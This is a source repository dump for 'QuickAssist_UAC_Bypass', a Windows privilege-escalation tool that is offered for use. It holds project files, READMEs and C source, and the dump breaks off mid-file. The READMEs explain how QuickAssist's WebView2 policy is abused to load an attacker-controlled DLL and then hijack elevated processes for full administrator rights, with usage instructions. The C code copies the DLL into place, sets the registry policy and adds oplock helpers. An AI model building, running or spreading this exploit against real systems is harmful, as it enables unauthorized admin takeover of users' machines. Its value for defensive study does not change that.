├── VersionInfo1.bin
├── OskSupport
    ├── cpp.hint
    ├── OpLock.h
    ├── README.md
    ├── OskSupport.vcxproj.filters
    ├── OskSupport.sln
    ├── OpLock.c
    ├── OskSupport.vcxproj
    └── dllmain.c
├── QuickAssist_UAC_Bypass.rc
├── quickassist_uac_bypass_win11.png
├── resource.h
├── QuickAssist_UAC_Bypass.vcxproj.filters
├── QuickAssist_UAC_Bypass.sln
├── README.md
├── QuickAssist_UAC_Bypass.vcxproj
├── QuickAssist_UAC_Bypass.c
└── .gitignore


/VersionInfo1.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R41N3RZUF477/QuickAssist_UAC_Bypass/HEAD/VersionInfo1.bin


--------------------------------------------------------------------------------
/OskSupport/cpp.hint:
--------------------------------------------------------------------------------
1 | #define OSKSUPPORT_API __declspec(dllexport)
2 | #define OSKSUPPORT_API __declspec(dllimport)
3 | 


--------------------------------------------------------------------------------
/QuickAssist_UAC_Bypass.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R41N3RZUF477/QuickAssist_UAC_Bypass/HEAD/QuickAssist_UAC_Bypass.rc


--------------------------------------------------------------------------------
/quickassist_uac_bypass_win11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/R41N3RZUF477/QuickAssist_UAC_Bypass/HEAD/quickassist_uac_bypass_win11.png


--------------------------------------------------------------------------------
/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by QuickAssist_UAC_Bypass.rc
4 | //
5 | #define IDR_RCDATA1                     101
6 | 


--------------------------------------------------------------------------------
/OskSupport/OpLock.h:
--------------------------------------------------------------------------------
 1 | #ifndef __OPLOCK_H__
 2 | #define __OPLOCK_H__
 3 | 
 4 | #include <Windows.h>
 5 | 
 6 | typedef struct _OPLOCK_FILE_CONTEXT {
 7 | 	DWORD len;
 8 | 	HANDLE file;
 9 | 	OVERLAPPED overlapped;
10 | } OPLOCK_FILE_CONTEXT, *POPLOCK_FILE_CONTEXT;
11 | 
12 | BOOL OpLockFile(const WCHAR* filename, ACCESS_MASK access, DWORD sharemode, BOOL exclusive, POPLOCK_FILE_CONTEXT ofc);
13 | BOOL WaitForOpLock(POPLOCK_FILE_CONTEXT ofc, DWORD timeout);
14 | BOOL ReleaseOpLock(POPLOCK_FILE_CONTEXT ofc);
15 | 
16 | #endif
17 | 


--------------------------------------------------------------------------------
/OskSupport/README.md:
--------------------------------------------------------------------------------
1 | # OskSupport.dll
2 | 
3 | This DLL can be used in combination with any UIAccess bypass to elevate to full administrator. It can be used in conjunction with osk.exe (DLL hijacking OskSupport.dll). When this DLL gets loaded in an UIAccess process with high integrity, it will search for any elevated window of the current session and will use its integrity level to get a full access process handle of the process that owns the elevated window by using GetProcessHandleFromHwnd() (available since Windows 10 1809; use SetWindowsHookEx() for previous Windows versions). If no elevated window exists then an elevated scheduled task will be executed to create an elevated window for the current session.
4 | 


--------------------------------------------------------------------------------
/OskSupport/OskSupport.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <None Include="cpp.hint" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClCompile Include="dllmain.c">
22 |       <Filter>Source Files</Filter>
23 |     </ClCompile>
24 |     <ClCompile Include="OpLock.c">
25 |       <Filter>Source Files</Filter>
26 |     </ClCompile>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClInclude Include="OpLock.h">
30 |       <Filter>Header Files</Filter>
31 |     </ClInclude>
32 |   </ItemGroup>
33 | </Project>


--------------------------------------------------------------------------------
/QuickAssist_UAC_Bypass.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="QuickAssist_UAC_Bypass.c">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 |   <ItemGroup>
23 |     <ClInclude Include="resource.h">
24 |       <Filter>Header Files</Filter>
25 |     </ClInclude>
26 |   </ItemGroup>
27 |   <ItemGroup>
28 |     <ResourceCompile Include="QuickAssist_UAC_Bypass.rc">
29 |       <Filter>Resource Files</Filter>
30 |     </ResourceCompile>
31 |   </ItemGroup>
32 | </Project>


--------------------------------------------------------------------------------
/OskSupport/OskSupport.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.13.35806.99 d17.13
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "OskSupport", "OskSupport.vcxproj", "{364FC33A-0D3F-4D16-8F12-C8B4790BF1A0}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{364FC33A-0D3F-4D16-8F12-C8B4790BF1A0}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{364FC33A-0D3F-4D16-8F12-C8B4790BF1A0}.Debug|x64.Build.0 = Debug|x64
18 | 		{364FC33A-0D3F-4D16-8F12-C8B4790BF1A0}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{364FC33A-0D3F-4D16-8F12-C8B4790BF1A0}.Debug|x86.Build.0 = Debug|Win32
20 | 		{364FC33A-0D3F-4D16-8F12-C8B4790BF1A0}.Release|x64.ActiveCfg = Release|x64
21 | 		{364FC33A-0D3F-4D16-8F12-C8B4790BF1A0}.Release|x64.Build.0 = Release|x64
22 | 		{364FC33A-0D3F-4D16-8F12-C8B4790BF1A0}.Release|x86.ActiveCfg = Release|Win32
23 | 		{364FC33A-0D3F-4D16-8F12-C8B4790BF1A0}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {33F6783F-15F4-4F68-B55F-E3BBD9D1564E}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/QuickAssist_UAC_Bypass.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.13.35806.99 d17.13
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "QuickAssist_UAC_Bypass", "QuickAssist_UAC_Bypass.vcxproj", "{931D07D7-A3C4-40C3-89B2-B56EC5B5EBA6}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{931D07D7-A3C4-40C3-89B2-B56EC5B5EBA6}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{931D07D7-A3C4-40C3-89B2-B56EC5B5EBA6}.Debug|x64.Build.0 = Debug|x64
18 | 		{931D07D7-A3C4-40C3-89B2-B56EC5B5EBA6}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{931D07D7-A3C4-40C3-89B2-B56EC5B5EBA6}.Debug|x86.Build.0 = Debug|Win32
20 | 		{931D07D7-A3C4-40C3-89B2-B56EC5B5EBA6}.Release|x64.ActiveCfg = Release|x64
21 | 		{931D07D7-A3C4-40C3-89B2-B56EC5B5EBA6}.Release|x64.Build.0 = Release|x64
22 | 		{931D07D7-A3C4-40C3-89B2-B56EC5B5EBA6}.Release|x86.ActiveCfg = Release|Win32
23 | 		{931D07D7-A3C4-40C3-89B2-B56EC5B5EBA6}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {4A3EDAFC-D42B-4236-BBAF-F4831D82DF78}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # QuickAssist UAC Bypass
 2 | 
 3 | QuickAssist is an application that was introduced in Windows 10 1809. It is an UIAccess binary that is installed by default and can be abused to bypass UAC. Because QuickAssist uses WebView2 for the login mask it can be tricked by the BrowserExecutableFolder group policy to load WebView2 and therefore an attacker-controlled DLL from an arbitrary location. Loading the DLL in QuickAssist process grants high integrity but no administrator permissions.
 4 | This seems like a "downgrade" to a normal UAC bypasses with auto-elevate at first. Other UIAccess/UIPI bypasses try to take control over elevated windows by sending inputs to them. But this is not necessary. The integrity level allows the use of SetWindowsHookExW() (pre Windows 10 1809 compatible) or GetProcessHandleFromHwnd() to take over elevated processes that have a window. If no elevated window exists in the current session, then one could be created by starting an elevated scheduled task. And because no prompts are ever shown on UIAccess programs this makes these kinds of UAC bypasses even better than regular UAC bypasses. This UAC bypass therefore also serves as a PoC to show that any UIAccess bypass can be considered a full UAC bypass. Any previous UAC bypass that can be "downgraded" to an UIAccess bypass can therefore be upgraded to an always notify compatible UAC bypass.
 5 | 
 6 | **Works on Windows 10 1809 upwards and Windows 11**
 7 | This UAC bypass works with always notify but has some caveats:
 8 |  - Works only on clients (not Windows Servers)
 9 |  - WebView2 version 87 or later must be installed (needed for QuickAssist; installed during MS Edge updates)
10 |  - QuickAssist is optional in Windows 11 (but installed by default)
11 | 
12 | **Usage:**
13 | 
14 |     Usage: QuickAssist_UAC_Bypass.exe [path_to_dll]
15 |     
16 |     Example: QuickAssist_UAC_Bypass.exe OskSupport.dll
17 | 
18 | ![QuickAssist_UAC_Bypass.exe bypasses UAC](quickassist_uac_bypass_win11.png)
19 | 


--------------------------------------------------------------------------------
/OskSupport/OpLock.c:
--------------------------------------------------------------------------------
  1 | #include "OpLock.h"
  2 | 
  3 | #pragma warning( disable : 6258)
  4 | 
  5 | BOOL OpLockFile(const WCHAR* filename, ACCESS_MASK access, DWORD sharemode, BOOL exclusive, POPLOCK_FILE_CONTEXT ofc)
  6 | {
  7 | 	DWORD bret = 0;
  8 | 	REQUEST_OPLOCK_INPUT_BUFFER roib = { 0 };
  9 | 	REQUEST_OPLOCK_OUTPUT_BUFFER roob = { 0 };
 10 | 	DWORD flags = 0;
 11 | 
 12 | 	if (!filename)
 13 | 	{
 14 | 		return FALSE;
 15 | 	}
 16 | 	if (!ofc)
 17 | 	{
 18 | 		return FALSE;
 19 | 	}
 20 | 	if (ofc->len < sizeof(OPLOCK_FILE_CONTEXT))
 21 | 	{
 22 | 		return FALSE;
 23 | 	}
 24 | 
 25 | 	memset(&ofc->overlapped, 0, sizeof(OVERLAPPED));
 26 | 	memset(&roib, 0, sizeof(roib));
 27 | 	memset(&roob, 0, sizeof(roob));
 28 | 	roib.StructureLength = sizeof(roib);
 29 | 	roib.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
 30 | 	roib.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
 31 | 	roib.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
 32 | 	roob.StructureLength = sizeof(roob);
 33 | 	roob.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
 34 | 	ofc->overlapped.hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
 35 | 
 36 | 	if (!ofc->overlapped.hEvent)
 37 | 	{
 38 | 		return FALSE;
 39 | 	}
 40 | 	flags = FILE_FLAG_OVERLAPPED;
 41 | 	if (GetFileAttributesW(filename) & FILE_ATTRIBUTE_DIRECTORY)
 42 | 	{
 43 | 		flags |= FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT;
 44 | 	}
 45 | 
 46 | 	if (!access)
 47 | 	{
 48 | 		access = GENERIC_READ;
 49 | 	}
 50 | 	ofc->file = CreateFileW(filename, access, sharemode, NULL, OPEN_EXISTING, flags, NULL);
 51 | 	if (ofc->file == INVALID_HANDLE_VALUE)
 52 | 	{
 53 | 		return FALSE;
 54 | 	}
 55 | 
 56 | 	if (exclusive)
 57 | 	{
 58 | 		bret = 0;
 59 | 		DeviceIoControl(ofc->file, FSCTL_REQUEST_OPLOCK_LEVEL_1, NULL, 0, NULL, 0, &bret, &ofc->overlapped);
 60 | 	}
 61 | 	else
 62 | 	{
 63 | 		DeviceIoControl(ofc->file, FSCTL_REQUEST_OPLOCK, &roib, sizeof(roib), &roob, sizeof(roob), NULL, &ofc->overlapped);
 64 | 	}
 65 | 
 66 | 	if (GetLastError() != ERROR_IO_PENDING)
 67 | 	{
 68 | 		return FALSE;
 69 | 	}
 70 | 
 71 | 	return TRUE;
 72 | }
 73 | 
 74 | static DWORD WINAPI WaitForOpLockThread(LPVOID p)
 75 | {
 76 | 	DWORD bret = 0;
 77 | 	POPLOCK_FILE_CONTEXT ofc = (POPLOCK_FILE_CONTEXT)p;
 78 | 
 79 | 	if (!p)
 80 | 	{
 81 | 		return 1;
 82 | 	}
 83 | 
 84 | 	bret = 0;
 85 | 	if (!GetOverlappedResult(ofc->file, &ofc->overlapped, &bret, TRUE))
 86 | 	{
 87 | 		return 1;
 88 | 	}
 89 | 
 90 | 	return 0;
 91 | }
 92 | 
 93 | BOOL WaitForOpLock(POPLOCK_FILE_CONTEXT ofc, DWORD timeout)
 94 | {
 95 | 	DWORD exitcode = 0;
 96 | 	HANDLE thread = NULL;
 97 | 
 98 | 	if (!ofc)
 99 | 	{
100 | 		return FALSE;
101 | 	}
102 | 	if (ofc->len < sizeof(OPLOCK_FILE_CONTEXT))
103 | 	{
104 | 		return FALSE;
105 | 	}
106 | 
107 | 	thread = CreateThread(NULL, 0x1000, (LPTHREAD_START_ROUTINE)WaitForOpLockThread, (LPVOID)ofc, STACK_SIZE_PARAM_IS_A_RESERVATION, NULL);
108 | 	if (thread)
109 | 	{
110 | 		if (WaitForSingleObject(thread, timeout) != WAIT_OBJECT_0)
111 | 		{
112 | 			TerminateThread(thread, 1);
113 | 			CloseHandle(thread);
114 | 			return FALSE;
115 | 		}
116 | 		if (!GetExitCodeThread(thread, &exitcode))
117 | 		{
118 | 			CloseHandle(thread);
119 | 			return FALSE;
120 | 		}
121 | 		CloseHandle(thread);
122 | 		if (exitcode)
123 | 		{
124 | 			return FALSE;
125 | 		}
126 | 		return TRUE;
127 | 	}
128 | 
129 | 	return FALSE;
130 | }
131 | 
132 | BOOL ReleaseOpLock(POPLOCK_FILE_CONTEXT ofc)
133 | {
134 | 	if (!ofc)
135 | 	{
136 | 		return FALSE;
137 | 	}
138 | 	if (ofc->len < sizeof(OPLOCK_FILE_CONTEXT))
139 | 	{
140 | 		return FALSE;
141 | 	}
142 | 
143 | 	CloseHandle(ofc->overlapped.hEvent);
144 | 	CloseHandle(ofc->file);
145 | 
146 | 	return TRUE;
147 | }
148 | 


--------------------------------------------------------------------------------
/QuickAssist_UAC_Bypass.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{931d07d7-a3c4-40c3-89b2-b56ec5b5eba6}</ProjectGuid>
 25 |     <RootNamespace>QuickAssistUACBypass</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <ClCompile>
 75 |       <WarningLevel>Level3</WarningLevel>
 76 |       <SDLCheck>true</SDLCheck>
 77 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 78 |       <ConformanceMode>true</ConformanceMode>
 79 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
 80 |     </ClCompile>
 81 |     <Link>
 82 |       <SubSystem>Console</SubSystem>
 83 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 84 |     </Link>
 85 |   </ItemDefinitionGroup>
 86 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 87 |     <ClCompile>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 90 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 91 |       <SDLCheck>true</SDLCheck>
 92 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 93 |       <ConformanceMode>true</ConformanceMode>
 94 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
 95 |     </ClCompile>
 96 |     <Link>
 97 |       <SubSystem>Console</SubSystem>
 98 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
 99 |       <OptimizeReferences>true</OptimizeReferences>
100 |       <GenerateDebugInformation>true</GenerateDebugInformation>
101 |     </Link>
102 |   </ItemDefinitionGroup>
103 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
104 |     <ClCompile>
105 |       <WarningLevel>Level3</WarningLevel>
106 |       <SDLCheck>true</SDLCheck>
107 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
108 |       <ConformanceMode>true</ConformanceMode>
109 |       <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
110 |     </ClCompile>
111 |     <Link>
112 |       <SubSystem>Console</SubSystem>
113 |       <GenerateDebugInformation>true</GenerateDebugInformation>
114 |     </Link>
115 |   </ItemDefinitionGroup>
116 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
117 |     <ClCompile>
118 |       <WarningLevel>Level3</WarningLevel>
119 |       <FunctionLevelLinking>true</FunctionLevelLinking>
120 |       <IntrinsicFunctions>true</IntrinsicFunctions>
121 |       <SDLCheck>true</SDLCheck>
122 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
123 |       <ConformanceMode>true</ConformanceMode>
124 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
125 |     </ClCompile>
126 |     <Link>
127 |       <SubSystem>Console</SubSystem>
128 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
129 |       <OptimizeReferences>true</OptimizeReferences>
130 |       <GenerateDebugInformation>true</GenerateDebugInformation>
131 |     </Link>
132 |   </ItemDefinitionGroup>
133 |   <ItemGroup>
134 |     <ClCompile Include="QuickAssist_UAC_Bypass.c" />
135 |   </ItemGroup>
136 |   <ItemGroup>
137 |     <ClInclude Include="resource.h" />
138 |   </ItemGroup>
139 |   <ItemGroup>
140 |     <ResourceCompile Include="QuickAssist_UAC_Bypass.rc" />
141 |   </ItemGroup>
142 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
143 |   <ImportGroup Label="ExtensionTargets">
144 |   </ImportGroup>
145 | </Project>


--------------------------------------------------------------------------------
/QuickAssist_UAC_Bypass.c:
--------------------------------------------------------------------------------
  1 | #include <stdlib.h>
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | 
  5 | #include <Windows.h>
  6 | 
  7 | #include "resource.h"
  8 | 
  9 | const WCHAR* WEBVIEW_DIR = L"\\EBWebView";
 10 | #ifdef _WIN64
 11 | const WCHAR* ARCH_DIR = L"\\x64";
 12 | #else
 13 | const WCHAR* ARCH_DIR = L"\\x86";
 14 | #endif
 15 | const WCHAR* WEBVIEW_DLL = L"\\EmbeddedBrowserWebView.dll";
 16 | const WCHAR* WEBVIEW_POLICY_KEY = L"Software\\Policies\\Microsoft\\Edge\\WebView2\\BrowserExecutableFolder";
 17 | const WCHAR* WEBVIEW_POLICY_VALUE = L"QuickAssist.exe";
 18 | const WCHAR* FALLBACK_ENVKEY = L"Volatile Environment";
 19 | const WCHAR* FALLBACK_ENVVAR = L"WEBVIEW2_BROWSER_EXECUTABLE_FOLDER";
 20 | const WCHAR* QUICKASSIST_BIN = L"\\QuickAssist.exe";
 21 | const WCHAR* QUICKASSIST_PROTOCOL = L"ms-quick-assist:";
 22 | 
 23 | static BOOL AddWebView2VersionInfo(const WCHAR* dll_path)
 24 | {
 25 |     HRSRC hrsrc = NULL;
 26 |     DWORD ressize = 0;
 27 |     HGLOBAL loadres = NULL;
 28 |     LPVOID res = NULL;
 29 |     HANDLE update = NULL;
 30 | 
 31 |     hrsrc = FindResourceW(NULL, MAKEINTRESOURCEW(IDR_RCDATA1), RT_RCDATA);
 32 |     if (!hrsrc)
 33 |     {
 34 |         return FALSE;
 35 |     }
 36 |     ressize = SizeofResource(NULL, hrsrc);
 37 |     if (!ressize)
 38 |     {
 39 |         return FALSE;
 40 |     }
 41 |     loadres = LoadResource(NULL, hrsrc);
 42 |     if (!loadres)
 43 |     {
 44 |         return FALSE;
 45 |     }
 46 |     res = LockResource(loadres);
 47 |     update = BeginUpdateResourceW(dll_path, FALSE);
 48 |     if (!update)
 49 |     {
 50 |         return FALSE;
 51 |     }
 52 |     if (!UpdateResourceW(update, RT_VERSION, MAKEINTRESOURCEW(1), 0x1033, res, ressize))
 53 |     {
 54 |         EndUpdateResourceW(update, TRUE);
 55 |         return TRUE;
 56 |     }
 57 |     if (!EndUpdateResourceW(update, FALSE))
 58 |     {
 59 |         EndUpdateResourceW(update, TRUE);
 60 |         return TRUE;
 61 |     }
 62 |     return TRUE;
 63 | }
 64 | 
 65 | static BOOL RemoveDLLForWebView(const WCHAR* base_path)
 66 | {
 67 |     WCHAR path[MAX_PATH] = { 0 };
 68 |     int dir1_len = 0;
 69 |     int dir2_len = 0;
 70 | 
 71 |     if (!base_path)
 72 |     {
 73 |         return FALSE;
 74 |     }
 75 |     if (lstrlenW(base_path) > 220)
 76 |     {
 77 |         return FALSE;
 78 |     }
 79 | 
 80 |     lstrcpyW(path, base_path);
 81 |     lstrcatW(path, WEBVIEW_DIR);
 82 |     dir1_len = lstrlenW(path);
 83 |     lstrcatW(path, ARCH_DIR);
 84 |     dir2_len = lstrlenW(path);
 85 |     lstrcatW(path, WEBVIEW_DLL);
 86 |     if (!DeleteFileW(path))
 87 |     {
 88 |         return FALSE;
 89 |     }
 90 |     path[dir2_len] = L'\0';
 91 |     if (!RemoveDirectoryW(path))
 92 |     {
 93 |         return FALSE;
 94 |     }
 95 |     path[dir1_len] = L'\0';
 96 |     if (!RemoveDirectoryW(path))
 97 |     {
 98 |         return FALSE;
 99 |     }
100 |     return TRUE;
101 | }
102 | 
103 | static BOOL CopyDLLForWebView(const WCHAR* base_path, const WCHAR* dll_path)
104 | {
105 |     WCHAR path[MAX_PATH] = { 0 };
106 |     int dir1_len = 0;
107 |     int dir2_len = 0;
108 | 
109 |     if (!base_path)
110 |     {
111 |         return FALSE;
112 |     }
113 |     if (lstrlenW(base_path) > 220)
114 |     {
115 |         return FALSE;
116 |     }
117 | 
118 |     lstrcpyW(path, base_path);
